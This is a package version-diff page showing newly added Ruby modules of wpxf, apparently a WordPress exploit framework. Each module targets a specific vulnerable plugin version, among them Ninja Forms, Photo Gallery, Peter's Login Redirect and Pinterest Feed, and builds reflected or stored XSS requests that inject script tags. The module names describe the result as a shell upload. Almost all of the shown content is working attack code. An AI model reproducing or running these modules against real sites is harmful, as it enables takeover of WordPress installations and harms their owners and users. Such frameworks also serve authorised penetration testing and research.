RubyGems - wpxf - Versions diffs - 2.0.0a - Mend

wpxf 2.0.0a

Files changed (455) hide show

data/lib/wpxf/modules/exploit/xss/reflected/new_year_firework_reflected_xss_shell_upload.rb ADDED

@@ -0,0 +1,34 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::NewYearFireworkReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  def initialize
+    super
+    update_info(
+      name: 'New Year Firework <= 1.1.9 Reflected XSS Shell Upload',
+      author: [
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8451'],
+        ['URL', 'http://www.vapidlabs.com/wp/wp_advisory.php?v=453']
+      ],
+      date: 'Feb 09 2016'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('new-year-firework')
+  end
+  def vulnerable_url
+    normalize_uri(wordpress_url_plugins, 'new-year-firework', 'firework', 'index.php')
+  end
+  def url_with_xss
+    "#{vulnerable_url}?text=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/ninja_forms_reflected_xss_shell_upload.rb ADDED

@@ -0,0 +1,37 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::NinjaFormsReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  def initialize
+    super
+    update_info(
+      name: 'Ninja Forms <= 2.9.51 Reflected XSS Shell Upload',
+      author: [
+        'Han Sahin', # Discovery
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8560'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/multiple_cross_site_scripting_vulnerabilities_in_ninja_forms_wordpress_plugin.html']
+      ],
+      date: 'Jul 19 2016'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('ninja-forms', '2.9.52')
+  end
+  def vulnerable_url
+    wordpress_url_admin_ajax
+  end
+  def url_with_xss
+    "#{vulnerable_url}?step=4&total_steps=6"\
+    "&args[form_id]=#{Utility::Text.rand_numeric(2)}%3Cimg%20src%3dx%20onerror%3d#{xss_ascii_encoded_include_script}%3E"\
+    "&args[filename]=#{Utility::Text.rand_alpha(5)}"\
+    '&action=nf_download_all_subs'
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/no_external_links_reflected_xss_shell_upload.rb ADDED

@@ -0,0 +1,39 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::NoExternalLinksReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  include ERB::Util
+  def initialize
+    super
+    update_info(
+      name: 'WP No External Links <= 3.5.18 Reflected XSS Shell Upload',
+      author: [
+        'DefenseCode', # Discovery
+        'rastating'    # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8840'],
+        ['URL', 'http://defensecode.com/advisories/DC-2017-01-022_WordPress_No_External_Links_Plugin_Advisory.pdf']
+      ],
+      date: 'May 31 2017'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('wp-noexternallinks', '3.5.19')
+  end
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'options-general.php')
+  end
+  def url_payload
+    url_encode("\"><script>#{xss_ascii_encoded_include_script}</script>")
+  end
+  def url_with_xss
+    "#{vulnerable_url}?page=wp-noexternallinks%2Fwp-noexternallinks-options.php&action=stats&date1=#{url_payload}"
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/ocim_mp3_reflected_xss_shell_upload.rb ADDED

@@ -0,0 +1,38 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::OcimMp3ReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  def initialize
+    super
+    update_info(
+      name: 'Ocim MP3 Reflected XSS Shell Upload',
+      author: [
+        'Soufiane Boussali', # Discovery
+        'rastating'          # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8425']
+      ],
+      date: 'Mar 07 2016'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('ocim-mp3')
+  end
+  def vulnerable_url
+    normalize_uri(
+      wordpress_url_plugins,
+      'ocim-mp3',
+      'source',
+      'page.php'
+    )
+  end
+  def url_with_xss
+    "#{vulnerable_url}?id=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E"
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/pagination_reflected_xss_shell_upload.rb ADDED

@@ -0,0 +1,20 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::PaginationReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Pagination <= 1.0.6 Reflected XSS Shell Upload'
+    )
+  end
+  def plugin_name
+    'pagination'
+  end
+  def fixed_version
+    '1.0.6.1'
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/pdf_print_reflected_xss_shell_upload.rb ADDED

@@ -0,0 +1,20 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::PDFPrintReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'PDF & Print <= 1.9.3 Reflected XSS Shell Upload'
+    )
+  end
+  def plugin_name
+    'pdf-print'
+  end
+  def fixed_version
+    '1.9.3.1'
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/peters_login_redirect_reflected_xss_shell_upload.rb ADDED

@@ -0,0 +1,53 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::PetersLoginRedirectReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+  def initialize
+    super
+    update_info(
+      name: 'Peter\'s Login Redirect <= 2.9.0 Reflected XSS Shell Upload',
+      author: [
+        'Yorick Koster', # Disclosure
+        'rastating'      # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8602'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_cross_site_request_forgery_in_peter_s_login_redirect_wordpress_plugin.html']
+      ],
+      date: 'Aug 15 2016'
+    )
+    register_options([
+      StringOption.new(
+        name: 'user_role',
+        desc: 'The user role to store the script against',
+        default: 'Administrator',
+        required: true
+      )
+    ])
+  end
+  def check
+    check_plugin_version_from_changelog('peters-login-redirect', 'readme.txt', '2.9.1')
+  end
+  def user_role
+    datastore['user_role'].downcase
+  end
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'options-general.php?page=wplogin_redirect.php')
+  end
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'rul_role' => user_role,
+      'rul_role_address' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>",
+      'rul_role_logout' => '',
+      'rul_role_submit' => 'Add role rule'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/photo_gallery_xss_shell_upload.rb ADDED

@@ -0,0 +1,46 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::PhotoGalleryReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  def initialize
+    super
+    update_info(
+      name: 'Photo Gallery by WD <= 1.3.66 Reflected XSS Shell Upload',
+      author: [
+        'Karim El Ouerghemmi', # Dislosure
+        'rastating'            # WPXF module
+      ],
+      references: [
+        ['WPVDB', '9031']
+      ],
+      date: 'Feb 22 2018'
+    )
+    register_options([
+      IntegerOption.new(
+        name: 'gallery_id',
+        desc: 'A valid Photo Gallery gallery ID',
+        required: true
+      ),
+      IntegerOption.new(
+        name: 'image_id',
+        desc: 'A valid ID of an image within the chosen gallery',
+        required: true
+      )
+    ])
+  end
+  def check
+    check_plugin_version_from_readme('photo-gallery', '1.3.67')
+  end
+  def xss_payload
+    url_encode(url_encode("\"><script>#{xss_ascii_encoded_include_script}</script>"))
+  end
+  def url_with_xss
+    "#{wordpress_url_admin_ajax}?action=GalleryBox&gallery_id=#{datastore['gallery_id']}&image_id=#{datastore['image_id']}&watermark_link=#{xss_payload}&watermark_type=image"
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/pinterest_feed_xss_shell_upload.rb ADDED

@@ -0,0 +1,37 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::PinterestFeedReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+  def initialize
+    super
+    update_info(
+      name: 'Pinterest Feed <= 1.1.1 Reflected XSS Shell Upload',
+      author: [
+        'd4wner',   # Dislosure
+        'rastating' # WPXF module
+      ],
+      references: [
+        ['CVE', '2018-5653'],
+        ['CVE', '2018-5654'],
+        ['CVE', '2018-5655'],
+        ['CVE', '2018-5656'],
+        ['WPVDB', '9009']
+      ],
+      date: 'Jan 12 2018'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('weblizar-pinterest-feeds', '1.1.2')
+  end
+  def initial_script
+    create_basic_post_script(
+      wordpress_url_admin_ajax,
+      'action' => 'pffree_security',
+      'PFFREE_Access_Token' => "'\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>"
+    )
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/podlove_podcast_publisher_reflected_xss_shell_upload.rb ADDED

@@ -0,0 +1,36 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::PodlovePodcastPublisherReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+  def initialize
+    super
+    update_info(
+      name: 'Podlove Podcast Publisher <= 2.3.15 Reflected XSS Shell Upload',
+      author: [
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8697'],
+        ['URL', 'https://www.rastating.com/podlove-podcast-publisher-2-3-15-reflected-xss']
+      ],
+      date: 'Dec 14 2016'
+    )
+  end
+  def check
+    check_plugin_version_from_changelog('podlove-podcasting-plugin-for-wordpress', 'readme.txt', '2.3.16')
+  end
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php?page=podlove_episode_assets_settings_handle')
+  end
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'page' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script><a href=\\\""
+    )
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/pondol_form_to_mail_reflected_xss_shell_upload.rb ADDED

@@ -0,0 +1,34 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::PondolFormToMailReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  def initialize
+    super
+    update_info(
+      name: 'Pondol Form to Mail <= 1.1 Reflected XSS Shell Upload',
+      author: [
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8460'],
+        ['URL', 'http://www.vapidlabs.com/wp/wp_advisory.php?v=787']
+      ],
+      date: 'Feb 09 2016'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('pondol-formmail')
+  end
+  def vulnerable_url
+    normalize_uri(wordpress_url_plugins, 'pondol-formmail', 'pages', 'admin-mail-info.php')
+  end
+  def url_with_xss
+    "#{vulnerable_url}?itemid=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/pootle_button_reflected_xss_shell_upload.rb ADDED

@@ -0,0 +1,32 @@
+class Wpxf::Exploit::PootleButtonReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  def initialize
+    super
+    update_info(
+      name: 'Pootle Button <= 1.1.1 Reflected XSS Shell Upload',
+      author: [
+        'Ricardo Sanchez',                         # Disclosure
+        'Paul Williams <phyushin[at]phyubox.com>'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8930'],
+        ['URL', 'https://packetstormsecurity.com/files/144582/']
+      ],
+      date: 'Oct 12 2017'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('pootle-button', '1.2.0')
+  end
+  def vulnerable_url
+    wordpress_url_admin_ajax
+  end
+  def url_with_xss
+    "#{vulnerable_url}?action=pbtn_dialog&assets_url=%22%3E%3Cscript%3E#{xss_url_and_ascii_encoded_include_script}%3C%2Fscript%3E%3C"
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/popcash_integration_xss_shell_upload.rb ADDED

@@ -0,0 +1,34 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::PopcashIntegrationXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  def initialize
+    super
+    update_info(
+      name: 'PopCash.Net Code Integration Tool < 1.1 Reflected XSS Shell Upload',
+      author: [
+        'Ricardo Sanchez', # Dislosure
+        'rastating'        # WPXF module
+      ],
+      references: [
+        ['CVE', '2017-15810'],
+        ['WPVDB', '8936']
+      ],
+      date: 'Oct 12 2017'
+    )
+  end
+  def check
+    check_plugin_version_from_changelog('popcashnet-code-integration-tool', 'readme.txt', '1.1')
+  end
+  def xss_payload
+    url_encode("\"><script>#{xss_ascii_encoded_include_script}</script><!--")
+  end
+  def url_with_xss
+    "#{wordpress_url_admin_options}?page=popcash-net&tab=#{xss_payload}"
+  end
+end